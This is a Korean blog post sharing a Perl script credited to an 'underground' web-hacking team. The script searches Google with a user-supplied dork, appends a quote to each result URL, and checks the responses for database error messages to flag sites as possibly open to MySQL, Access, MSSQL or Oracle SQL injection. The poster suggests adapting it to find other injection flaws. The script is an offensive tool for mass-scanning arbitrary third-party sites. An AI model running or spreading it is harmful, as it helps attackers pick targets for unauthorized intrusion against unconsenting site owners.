본문 바로가기

[+] 유틸리티

Full MSSQL Injection PWNage

언더그라운드 웹해킹 전문 팀인 CWH 팀에 의해서 만들어진 것입니다.



#!/usr/bin/perl
 use LWP::Simple;
 use LWP::UserAgent;
 use HTTP::Request;
 my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
 print "+++++++++++++++++++++++++++++++\n";
 print "+     SQL - Google Search     +\n";
 print "+       CWH Underground       +\n";
 print "+++++++++++++++++++++++++++++++\n\n";
 print "Insert Dork:";
 chomp( my $dork = <STDIN> );
 print "Total Query Pages (10 Links/Pages) :";
 chomp( my $page = <STDIN> );
 print "\n[+] Result:\n\n";
 for($start = 0;$start != $page*10;$start += 10)
 { 
 $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
     $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
     $ua->timeout(10);
     $ua->env_proxy;
     $response = $ua->get($t);
     if ($response->is_success)
     {
         $c = $response->content;
         @stuff = split(/<a href=/,$c);
         foreach $line(@stuff)
         {
             if($line =~/(.*) class=l/ig)
             {
                 $out = $1;
                 $out =~ s/\"//g;
   $out =~s/$/\'/;   
   $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
   $ua->timeout(10);
   $ua->env_proxy;
   $response = $ua->get($out);
   $error = $response->content();
   if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
    {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
   elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
    {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
    {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
   elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
    {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
      }
  }
     }
        }






문서중 일부를 발췌 한 것입니다.

GoogleD0rk 검색프로그램 소스입니다. (MSSQL Injection)

저도 만들고 있었는데 한발 늦었군요 ㅡㅡ;;

응용하여 다른 injection 취약점이나 다른 기법 취약점 검색프로그램으로 만들어도 될 것 같습니다.